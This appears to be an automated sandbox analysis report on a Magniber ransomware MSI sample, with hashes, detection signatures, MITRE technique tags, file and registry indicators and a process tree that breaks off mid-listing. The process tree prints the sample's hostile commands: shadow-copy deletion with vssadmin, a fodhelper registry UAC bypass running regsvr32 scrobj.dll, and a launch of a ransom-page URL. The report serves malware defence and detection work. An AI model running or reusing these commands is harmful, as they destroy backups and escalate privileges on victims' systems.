magniber | fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55

Analysis

max time kernel
148s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
04-11-2022 18:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55.msi
Size

1.1MB
MD5

250a23219a576180547734430d71b0e6
SHA1

a5bcdb824d325d44c5e0feb5bf9389da520e6f82
SHA256

fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55
SHA512

e0c26cceff37d9328dddc9989ff75070b51a3ccd35c93e82fdcda3a828a90ac53d8604524f5195cc9d4865aa8680ccfd79f6d85710b46496ab9efea321c13417
SSDEEP

1536:j66iqjTbG3VvotZmMi0W7Ap0Ds0Dm78x:jAGelvoW0dQx

Score

10^/10

magniber persistence ransomware

Malware Config

Signatures

Detect magniber ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2740-143-0x000001FCFCDF0000-0x000001FCFCDF3000-memory.dmp	family_magniber
behavioral2/memory/4208-141-0x0000021E97B70000-0x0000021E97C7F000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ResizeExit.crw => C:\Users\Admin\Pictures\ResizeExit.crw.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\DismountPush.tiff => C:\Users\Admin\Pictures\DismountPush.tiff.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\NewJoin.tiff => C:\Users\Admin\Pictures\NewJoin.tiff.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\ReceiveExpand.tif => C:\Users\Admin\Pictures\ReceiveExpand.tif.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\ExitStop.crw => C:\Users\Admin\Pictures\ExitStop.crw.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\RenameUndo.crw => C:\Users\Admin\Pictures\RenameUndo.crw.yuyevbg	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\DismountPush.tiff	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\NewJoin.tiff	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\MountSkip.crw => C:\Users\Admin\Pictures\MountSkip.crw.yuyevbg	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

4208 MsiExec.exe
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe

pid	process
4208	MsiExec.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

MsiExec.exe

description	pid	process	target process
PID 4208 set thread context of 2740	4208	MsiExec.exe	sihost.exe
PID 4208 set thread context of 2784	4208	MsiExec.exe	svchost.exe
PID 4208 set thread context of 2880	4208	MsiExec.exe	taskhostw.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221104193005.pma	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\11fb347e-fef5-4a51-98a1-3495dfeb0c1e.tmp	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\e5713b7.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{8B0F0F68-120B-4579-87C8-8B074F5D9DFD}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI19F1.tmp	msiexec.exe
File created	C:\Windows\Installer\e5713b9.msi	msiexec.exe
File created	C:\Windows\Installer\e5713b7.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI14A1.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000dcccb42f1bc641320000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000dcccb42f0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900dcccb42f000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000dcccb42f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000dcccb42f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

3484 vssadmin.exe
3436 vssadmin.exe
1616 vssadmin.exe
5376 vssadmin.exe
5524 vssadmin.exe
5548 vssadmin.exe

pid	process
3484	vssadmin.exe
3436	vssadmin.exe
1616	vssadmin.exe
5376	vssadmin.exe
5524	vssadmin.exe
5548	vssadmin.exe

Modifies registry class 15 IoCs

Processes:

regsvr32.exeregsvr32.exeregsvr32.exemsedge.exesihost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
4804	msiexec.exe
4804	msiexec.exe
4208	MsiExec.exe
4208	MsiExec.exe
2700	msedge.exe
2700	msedge.exe
2116	msedge.exe
2116	msedge.exe
1836	identity_helper.exe
1836	identity_helper.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MsiExec.exe

pid process

4208 MsiExec.exe
4208 MsiExec.exe
4208 MsiExec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

2116 msedge.exe
2116 msedge.exe
2116 msedge.exe
2116 msedge.exe
2116 msedge.exe
2116 msedge.exe
2116 msedge.exe
2116 msedge.exe

pid	process
4208	MsiExec.exe
4208	MsiExec.exe
4208	MsiExec.exe

pid	process
2116	msedge.exe
2116	msedge.exe
2116	msedge.exe
2116	msedge.exe
2116	msedge.exe
2116	msedge.exe
2116	msedge.exe
2116	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	2796	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2796	msiexec.exe
Token: SeSecurityPrivilege	4804	msiexec.exe
Token: SeCreateTokenPrivilege	2796	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2796	msiexec.exe
Token: SeLockMemoryPrivilege	2796	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2796	msiexec.exe
Token: SeMachineAccountPrivilege	2796	msiexec.exe
Token: SeTcbPrivilege	2796	msiexec.exe
Token: SeSecurityPrivilege	2796	msiexec.exe
Token: SeTakeOwnershipPrivilege	2796	msiexec.exe
Token: SeLoadDriverPrivilege	2796	msiexec.exe
Token: SeSystemProfilePrivilege	2796	msiexec.exe
Token: SeSystemtimePrivilege	2796	msiexec.exe
Token: SeProfSingleProcessPrivilege	2796	msiexec.exe
Token: SeIncBasePriorityPrivilege	2796	msiexec.exe
Token: SeCreatePagefilePrivilege	2796	msiexec.exe
Token: SeCreatePermanentPrivilege	2796	msiexec.exe
Token: SeBackupPrivilege	2796	msiexec.exe
Token: SeRestorePrivilege	2796	msiexec.exe
Token: SeShutdownPrivilege	2796	msiexec.exe
Token: SeDebugPrivilege	2796	msiexec.exe
Token: SeAuditPrivilege	2796	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2796	msiexec.exe
Token: SeChangeNotifyPrivilege	2796	msiexec.exe
Token: SeRemoteShutdownPrivilege	2796	msiexec.exe
Token: SeUndockPrivilege	2796	msiexec.exe
Token: SeSyncAgentPrivilege	2796	msiexec.exe
Token: SeEnableDelegationPrivilege	2796	msiexec.exe
Token: SeManageVolumePrivilege	2796	msiexec.exe
Token: SeImpersonatePrivilege	2796	msiexec.exe
Token: SeCreateGlobalPrivilege	2796	msiexec.exe
Token: SeBackupPrivilege	4812	vssvc.exe
Token: SeRestorePrivilege	4812	vssvc.exe
Token: SeAuditPrivilege	4812	vssvc.exe
Token: SeBackupPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe
Token: SeTakeOwnershipPrivilege	4804	msiexec.exe
Token: SeRestorePrivilege	4804	msiexec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

msiexec.exemsedge.exe

pid process

2796 msiexec.exe
2796 msiexec.exe
2116 msedge.exe
2116 msedge.exe
2116 msedge.exe

pid	process
2796	msiexec.exe
2796	msiexec.exe
2116	msedge.exe
2116	msedge.exe
2116	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exesihost.exesvchost.exetaskhostw.exeMsiExec.execmd.exemsedge.exe

description	pid	process	target process
PID 4804 wrote to memory of 2088	4804	msiexec.exe	srtasks.exe
PID 4804 wrote to memory of 2088	4804	msiexec.exe	srtasks.exe
PID 4804 wrote to memory of 4208	4804	msiexec.exe	MsiExec.exe
PID 4804 wrote to memory of 4208	4804	msiexec.exe	MsiExec.exe
PID 2740 wrote to memory of 436	2740	sihost.exe	regsvr32.exe
PID 2740 wrote to memory of 436	2740	sihost.exe	regsvr32.exe
PID 2784 wrote to memory of 1376	2784	svchost.exe	regsvr32.exe
PID 2784 wrote to memory of 1376	2784	svchost.exe	regsvr32.exe
PID 2880 wrote to memory of 1496	2880	taskhostw.exe	regsvr32.exe
PID 2880 wrote to memory of 1496	2880	taskhostw.exe	regsvr32.exe
PID 4208 wrote to memory of 4264	4208	MsiExec.exe	cmd.exe
PID 4208 wrote to memory of 4264	4208	MsiExec.exe	cmd.exe
PID 4264 wrote to memory of 2116	4264	cmd.exe	msedge.exe
PID 4264 wrote to memory of 2116	4264	cmd.exe	msedge.exe
PID 2116 wrote to memory of 2060	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2060	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2600	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2700	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2700	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2548	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2548	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2548	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2548	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2548	2116	msedge.exe	msedge.exe
PID 2116 wrote to memory of 2548	2116	msedge.exe	msedge.exe

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:1496
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:3864
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:3648
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:1916
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3436
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1688
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5196
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:5368
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2784
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:1376
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1916
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:3880
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:536
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:1616
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1616
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5228
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:5392
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5548

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2796

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:436
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4640
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1616
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:4148
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3484
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4328
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5180
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:5312
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5376

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4804
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:2088
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 77EE6D78BDD99669C8365146717AB37F
  2⤵
  - Modifies extensions of user files
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:4208
- - C:\Windows\System32\cmd.exe
    cmd /c "start microsoft-edge:http://3648b6d8c8yuyevbg.diedsad.info/yuyevbg^&1^&33216336^&83^&421^&2219041
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://3648b6d8c8yuyevbg.diedsad.info/yuyevbg&1&33216336&83&421&2219041
      4⤵
      Adds Run key to start application
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffaa3c146f8,0x7ffaa3c14708,0x7ffaa3c14718
        5⤵
        
        PID:2060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
